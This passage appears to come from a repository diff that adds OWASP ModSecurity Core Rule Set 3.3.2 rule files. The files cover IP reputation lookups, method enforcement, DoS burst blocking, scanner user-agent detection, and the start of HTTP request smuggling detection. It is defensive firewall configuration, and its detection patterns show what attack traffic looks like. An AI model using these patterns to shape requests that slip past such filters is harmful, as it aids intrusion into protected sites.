tag:'OWASP_CRS',\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-RBL-LOOKUP"
#
# Check Client IP against ProjectHoneypot's HTTP Blacklist
# Ref: http://www.projecthoneypot.org/httpbl_api.php
#
# To use the blacklist, you must register for an HttpBL API Key
# and choose the traffic types to block. See section
# "Project Honey Pot HTTP Blacklist" in crs-setup.conf.
#
# Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey
#
# Skip HttpBL checks if user has not defined one of the TX:block_* variables.
# This prevents error "Operator error: RBL httpBl called but no key defined: set SecHttpBlKey"
SecRule &TX:block_suspicious_ip "@eq 0" \
"id:910130,\
phase:2,\
pass,\
t:none,\
nolog,\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
ver:'OWASP_CRS/3.3.2',\
chain,\
skipAfter:END-RBL-CHECK"
SecRule &TX:block_harvester_ip "@eq 0" \
"chain"
SecRule &TX:block_spammer_ip "@eq 0" \
"chain"
SecRule &TX:block_search_ip "@eq 0"
SecRule TX:REAL_IP "@rbl dnsbl.httpbl.org" \
"id:910140,\
phase:2,\
pass,\
capture,\
t:none,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-ip',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.httpbl_msg=%{tx.0}',\
chain"
SecRule TX:httpbl_msg "@rx RBL lookup of .*?.dnsbl.httpbl.org succeeded at TX:checkip. (.*?): .*" \
"capture,\
t:none,\
setvar:'tx.httpbl_msg=%{tx.1}'"
# The following regexs are generated based off re_operators.c
SecRule TX:block_search_ip "@eq 1" \
"id:910150,\
phase:2,\
block,\
t:none,\
msg:'HTTP Blacklist match for search engine IP',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-ip',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain,\
skipAfter:END-RBL-CHECK"
SecRule TX:httpbl_msg "@rx Search Engine" \
"setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'ip.reput_block_flag=1',\
setvar:'ip.reput_block_reason=%{rule.msg}',\
setvar:'ip.previous_rbl_check=1',\
expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\
expirevar:'ip.previous_rbl_check=86400'"
SecRule TX:block_spammer_ip "@eq 1" \
"id:910160,\
phase:2,\
block,\
t:none,\
msg:'HTTP Blacklist match for spammer IP',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-ip',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain,\
skipAfter:END-RBL-CHECK"
SecRule TX:httpbl_msg "@rx (?i)^.*? spammer .*?$" \
"setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'ip.reput_block_flag=1',\
setvar:'ip.reput_block_reason=%{rule.msg}',\
setvar:'ip.previous_rbl_check=1',\
expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\
expirevar:'ip.previous_rbl_check=86400'"
SecRule TX:block_suspicious_ip "@eq 1" \
"id:910170,\
phase:2,\
block,\
t:none,\
msg:'HTTP Blacklist match for suspicious IP',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-ip',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain,\
skipAfter:END-RBL-CHECK"
SecRule TX:httpbl_msg "@rx (?i)^.*? suspicious .*?$" \
"setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'ip.reput_block_flag=1',\
setvar:'ip.reput_block_reason=%{rule.msg}',\
setvar:'ip.previous_rbl_check=1',\
expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\
expirevar:'ip.previous_rbl_check=86400'"
SecRule TX:block_harvester_ip "@eq 1" \
"id:910180,\
phase:2,\
block,\
t:none,\
msg:'HTTP Blacklist match for harvester IP',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-ip',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain,\
skipAfter:END-RBL-CHECK"
SecRule TX:httpbl_msg "@rx (?i)^.*? harvester .*?$" \
"setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'ip.reput_block_flag=1',\
setvar:'ip.reput_block_reason=%{rule.msg}',\
setvar:'ip.previous_rbl_check=1',\
expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}',\
expirevar:'ip.previous_rbl_check=86400'"
SecAction \
"id:910190,\
phase:2,\
pass,\
t:none,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-ip',\
tag:'paranoia-level/1',\
ver:'OWASP_CRS/3.3.2',\
setvar:'ip.previous_rbl_check=1',\
expirevar:'ip.previous_rbl_check=86400'"
SecMarker "END-RBL-LOOKUP"
SecMarker "END-RBL-CHECK"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910013,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:910014,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910015,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:910016,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910017,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910018,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-910-IP-REPUTATION"

75
core/modsecurity/files/coreruleset/rules/REQUEST-911-METHOD-ENFORCEMENT.conf Normal file
View File

@@ -0,0 +1,75 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ Allowed Request Methods ]=-
#
# tx.allowed_methods is defined in the crs-setup.conf file
#
SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \
"id:911100,\
phase:2,\
block,\
msg:'Method is not allowed by policy',\
logdata:'%{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-generic',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/272/220/274',\
tag:'PCI/12.1',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-911-METHOD-ENFORCEMENT"

328
core/modsecurity/files/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf Normal file
View File

@@ -0,0 +1,328 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# Anti-Automation rules to detect Denial of Service attacks.
#
# Description of mechanics:
# When a request hits a non-static resource (TX:STATIC_EXTENSIONS), then a counter for the IP
# address is being raised (IP:DOS_COUNTER). If the counter (IP:DOS_COUNTER) hits a limit
# (TX:DOS_COUNTER_THRESHOLD), then a burst is identified (IP:DOS_BURST_COUNTER) and the
# counter (IP:DOS_COUNTER) is reset. The burst counter expires within a timeout period
# (TX:DOS_BURST_TIME_SLICE).
# If the burst counter (IP:DOS_BURST_COUNTER) is greater equal 2, then the blocking flag
# is being set (IP:DOS_BLOCK). The blocking flag (IP:DOS_BLOCK) expires within a timeout
# period (TX:DOS_BLOCK_TIMEOUT). All this counting happens in phase 5.
# There is a stricter sibling to this rule (912170) in paranoia level 2, where the
# burst counter check (IP:DOS_BURST_COUNTER) hits at greater equal 1.
#
# The blocking is done in phase 1: When the blocking flag is encountered (IP:DOS_BLOCK),
# then the request is dropped without sending a response. If this happens, then a
# counter is # raised (IP:DOS_BLOCK_COUNTER).
# When an IP address is blocked for the first time, then the blocking is reported in a
# message and a flag (IP:DOS_BLOCK_FLAG) is set. This flag expires in 60 seconds.
# When an IP address is blocked and the flag (IP:DOS_BLOCK_FLAG) is set, then the
# blocking is not being reported (to prevent a flood of alerts). When the flag
# (IP:DOS_BLOCK_FLAG) has expired and a new request is being blocked, then the
# counter (IP:DOS_BLOCK_COUNTER) is being reset to 0 and the block is being treated
# as the first block (-> alert).
# In order to be able to display the counter (IP:DOS_BLOCK_COUNTER) and resetting
# it at the same time, we copy the counter (IP:DOS_BLOCK_COUNTER) into a different
# variable (TX:DOS_BLOCK_COUNTER), which is then displayed in turn.
#
# Variables:
# IP:DOS_BLOCK Flag if an IP address should be blocked
# IP:DOS_BLOCK_COUNTER Counter of blocked requests
# IP:DOS_BLOCK_FLAG Flag keeping track of alert. Flag expires after 60 seconds.
# IP:DOS_BURST_COUNTER Burst counter
# IP:DOS_COUNTER Request counter (static resources are ignored)
# TX:DOS_BLOCK_COUNTER Copy of IP:DOS_BLOCK_COUNTER (needed for display reasons)
# TX:DOS_BLOCK_TIMEOUT Period in seconds a blocked IP will be blocked
# TX:DOS_COUNTER_THRESHOLD Limit of requests, where a burst is identified
# TX:DOS_BURST_TIME_SLICE Period in seconds when we will forget a burst
# TX:STATIC_EXTENSIONS Paths which can be ignored with regards to DoS
#
# As a precondition for these rules, please set the following three variables:
# - TX:DOS_BLOCK_TIMEOUT
# - TX:DOS_COUNTER_THRESHOLD
# - TX:DOS_BURST_TIME_SLICE
#
# And make sure that TX:STATIC_EXTENSIONS is also set.
#
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
#
# Skip if variables defining DoS protection are not set
#
SecRule &TX:dos_burst_time_slice "@eq 0" \
"id:912100,\
phase:1,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain,\
skipAfter:END-DOS-PROTECTION-CHECKS"
SecRule &TX:dos_counter_threshold "@eq 0" \
"chain"
SecRule &TX:dos_block_timeout "@eq 0"
SecRule &TX:dos_burst_time_slice "@eq 0" \
"id:912110,\
phase:5,\
pass,\
t:none,\
nolog,\
ver:'OWASP_CRS/3.3.2',\
chain,\
skipAfter:END-DOS-PROTECTION-CHECKS"
SecRule &TX:dos_counter_threshold "@eq 0" \
"chain"
SecRule &TX:dos_block_timeout "@eq 0"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912011,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912012,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ Anti-Automation / DoS Protection : Block ]=-
#
#
# Block and track # of requests and log
#
SecRule IP:DOS_BLOCK "@eq 1" \
"id:912120,\
phase:1,\
drop,\
msg:'Denial of Service (DoS) attack identified from %{tx.real_ip} (%{tx.dos_block_counter} hits since last alert)',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'paranoia-level/1',\
tag:'attack-dos',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/227/469',\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule &IP:DOS_BLOCK_FLAG "@eq 0" \
"setvar:'ip.dos_block_counter=+1',\
setvar:'ip.dos_block_flag=1',\
setvar:'tx.dos_block_counter=%{ip.dos_block_counter}',\
setvar:'ip.dos_block_counter=0',\
expirevar:'ip.dos_block_flag=60'"
#
# Block and track # of requests but don't log
#
SecRule IP:DOS_BLOCK "@eq 1" \
"id:912130,\
phase:1,\
drop,\
t:none,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'paranoia-level/1',\
tag:'attack-dos',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/227/469',\
ver:'OWASP_CRS/3.3.2',\
setvar:'ip.dos_block_counter=+1'"
#
# -=[ Anti-Automation / DoS Protection: Count requests ]=-
#
#
# Skip if we have blocked the request
#
SecRule IP:DOS_BLOCK "@eq 1" \
"id:912140,\
phase:5,\
pass,\
t:none,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'paranoia-level/1',\
tag:'attack-dos',\
ver:'OWASP_CRS/3.3.2',\
skipAfter:END-DOS-PROTECTION-CHECKS"
#
# DOS Counter: Count the number of requests to non-static resources
#
SecRule REQUEST_BASENAME "@rx .*?(\.[a-z0-9]{1,10})?$" \
"id:912150,\
phase:5,\
pass,\
capture,\
t:none,t:lowercase,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'paranoia-level/1',\
tag:'attack-dos',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/227/469',\
ver:'OWASP_CRS/3.3.2',\
setvar:'tx.extension=/%{TX.1}/',\
chain"
SecRule TX:EXTENSION "!@within %{tx.static_extensions}" \
"setvar:'ip.dos_counter=+1'"
#
# Check DOS Counter
# If the request count is greater than or equal to user settings,
# we raise the burst counter. This happens via two separate rules:
# - 912160: raise from 0 to 1
# - 912161: raise from 1 to 2
#
# This approach with two rules avoids raising the burst counter
# from 0 to 2 via two concurrent requests. We do not raise the
# burst counter beyond 2.
#
#
SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \
"id:912160,\
phase:5,\
pass,\
t:none,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'paranoia-level/1',\
tag:'attack-dos',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/227/469',\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule &IP:DOS_BURST_COUNTER "@eq 0" \
"setvar:'ip.dos_burst_counter=1',\
setvar:'!ip.dos_counter',\
expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'"
SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \
"id:912161,\
phase:5,\
pass,\
t:none,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'paranoia-level/1',\
tag:'attack-dos',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/227/469',\
ver:'OWASP_CRS/3.3.2',\
chain"
SecRule &IP:DOS_BURST_COUNTER "@ge 1" \
"setvar:'ip.dos_burst_counter=2',\
setvar:'!ip.dos_counter',\
expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'"
#
# Check DOS Burst Counter and set Block
# Check the burst counter - if greater than or equal to 2, then we set the IP
# block variable for a given expiry and issue an alert.
#
SecRule IP:DOS_BURST_COUNTER "@ge 2" \
"id:912170,\
phase:5,\
pass,\
t:none,\
log,\
msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'paranoia-level/1',\
tag:'attack-dos',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/227/469',\
ver:'OWASP_CRS/3.3.2',\
setvar:'ip.dos_block=1',\
expirevar:'ip.dos_block=%{tx.dos_block_timeout}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912013,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912014,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912019,phase:5,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
#
# Check DOS Burst Counter and set Block
# Check the burst counter - if greater than or equal to 1, then we set the IP
# block variable for a given expiry and issue an alert.
#
# This is a stricter sibling of rule 912170.
#
SecRule IP:DOS_BURST_COUNTER "@ge 1" \
"id:912171,\
phase:5,\
pass,\
t:none,\
log,\
msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-dos',\
tag:'paranoia-level/2',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/227/469',\
ver:'OWASP_CRS/3.3.2',\
setvar:'ip.dos_block=1',\
expirevar:'ip.dos_block=%{tx.dos_block_timeout}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912015,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912016,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912017,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912018,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-912-DOS-PROTECTION"
SecMarker "END-DOS-PROTECTION-CHECKS"

198
core/modsecurity/files/coreruleset/rules/REQUEST-913-SCANNER-DETECTION.conf Normal file
View File

@@ -0,0 +1,198 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ Vulnerability Scanner Checks ]=-
#
# These rules inspect the default User-Agent and Header values sent by
# various commercial and open source vuln scanners.
#
# The following rules contain User-Agent lists:
# 913100 - security scanners (data file scanners-user-agents.data)
# 913101 - scripting/generic HTTP clients (data file scripting-user-agents.data)
# 913102 - web crawlers/bots (data file crawlers-user-agents.data)
#
SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \
"id:913100,\
phase:2,\
block,\
capture,\
t:none,t:lowercase,\
msg:'Found User-Agent associated with security scanner',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-scanner',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/224/541/310',\
tag:'PCI/6.5.10',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'ip.reput_block_flag=1',\
setvar:'ip.reput_block_reason=%{rule.msg}',\
expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"
SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@pmFromFile scanners-headers.data" \
"id:913110,\
phase:2,\
block,\
capture,\
t:none,t:lowercase,\
msg:'Found request header associated with security scanner',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-scanner',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/224/541/310',\
tag:'PCI/6.5.10',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'ip.reput_block_flag=1',\
setvar:'ip.reput_block_reason=%{rule.msg}',\
expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"
SecRule REQUEST_FILENAME|ARGS "@pmFromFile scanners-urls.data" \
"id:913120,\
phase:2,\
block,\
capture,\
t:none,t:lowercase,\
msg:'Found request filename/argument associated with security scanner',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-scanner',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/224/541/310',\
tag:'PCI/6.5.10',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'ip.reput_block_flag=1',\
setvar:'ip.reput_block_reason=%{rule.msg}',\
expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
#
# -=[ Scripting/Generic User-Agents ]=-
#
# This rule detects user-agents associated with various HTTP client libraries
# and scripting languages. Detection suggests attempted access by some
# automated tool.
#
# This rule is a sibling of rule 913100.
#
SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scripting-user-agents.data" \
"id:913101,\
phase:2,\
block,\
capture,\
t:none,t:lowercase,\
msg:'Found User-Agent associated with scripting/generic HTTP client',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-scripting',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/224/541/310',\
tag:'PCI/6.5.10',\
tag:'paranoia-level/2',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\
setvar:'ip.reput_block_flag=1',\
setvar:'ip.reput_block_reason=%{rule.msg}',\
expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"
#
# -=[ Crawler User-Agents ]=-
#
# This rule detects user-agents associated with various crawlers, SEO tools,
# and bots, which have been reported to potentially misbehave.
# These crawlers can have legitimate uses when used with authorization.
#
# This rule is a sibling of rule 913100.
#
SecRule REQUEST_HEADERS:User-Agent "@pmFromFile crawlers-user-agents.data" \
"id:913102,\
phase:2,\
block,\
capture,\
t:none,t:lowercase,\
msg:'Found User-Agent associated with web crawler/bot',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-reputation-crawler',\
tag:'OWASP_CRS',\
tag:'capec/1000/118/224/541/310',\
tag:'PCI/6.5.10',\
tag:'paranoia-level/2',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\
setvar:'ip.reput_block_flag=1',\
setvar:'ip.reput_block_reason=%{rule.msg}',\
expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-913-SCANNER-DETECTION"

1599
core/modsecurity/files/coreruleset/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf Normal file
View File

File diff suppressed because it is too large Load Diff

363
core/modsecurity/files/coreruleset/rules/REQUEST-921-PROTOCOL-ATTACK.conf Normal file
View File

@@ -0,0 +1,363 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ HTTP Request Smuggling ]=-
#
# [ Rule Logic ]
# This rule looks for a HTTP / WEBDAV method name in combination with the word http/\d or a CR/LF character.
# This would point to an attempt to inject a 2nd request into the request, thus bypassing
# tests carried out on the primary request.
#
# [ References ]
# http://projects.webappsec.org/HTTP-Request-Smuggling
#
SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\s+(?:\/|\w)[^\s]*(?:\s+http\/\d|[\r\n])" \
"id:921110,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\
msg:'HTTP Request Smuggling Attack',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
